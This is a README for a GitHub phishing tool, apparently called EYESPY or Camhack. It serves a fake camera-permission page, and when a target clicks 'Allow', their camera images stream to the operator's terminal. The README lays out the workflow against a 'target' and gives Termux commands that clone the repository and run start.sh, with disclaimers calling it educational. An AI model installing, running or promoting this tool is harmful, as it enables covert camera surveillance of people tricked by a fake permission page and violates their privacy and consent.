Camhack
No description available
Install / Use
/learn @thakur2309/CamhackREADME
EYESPY 🔍 (Previously Camhack)
EYESPY is an educational tool created to demonstrate how camera access phishing attacks work in real-world scenarios.
It is intended purely for ethical hacking and cybersecurity awareness purposes.
⚠️ Warning: This tool is strictly for educational use. Any misuse may lead to legal consequences.
📌 Features
- Live camera phishing demonstration
- Generates a fake camera permission page
- Captures target's camera feed in real-time
- Compatible with Android (via Termux) and Linux
⚙️ Installation
This tool requires a basic Termux setup and a few command-line steps.
Please refer to the full installation guide in our YouTube video (linked below).
▶️ How It Works
- EYESPY generates a phishing page that asks for camera permission.
- You share this link with the target.
- When the target clicks “Allow,” their device camera activates.
- Captured images are sent to your terminal in real-time.
🎬 YouTube Video
🔥 Watch Full Setup & Live Demo on YouTube
⚠️ Disclaimer
- This tool is made for educational and ethical purposes only.
- Unauthorized use or malicious activity is strictly prohibited.
- The developer and this channel are not responsible for any misuse.

Termux Full Install and Setup
pkg update && pkg upgrade && pkg install git && git clone https://github.com/thakur2309/Camhack.git && cd Camhack && chmod +X start.sh && bash start.sh
[TERMUX] Packege Install Comments
pkg update && pkg upgrade -y
pkg install php
pkg install git
git clone https://github.com/thakur2309/Camhack.git
cd Camhack
chmod +x start.sh
Start tool command
bash start.sh
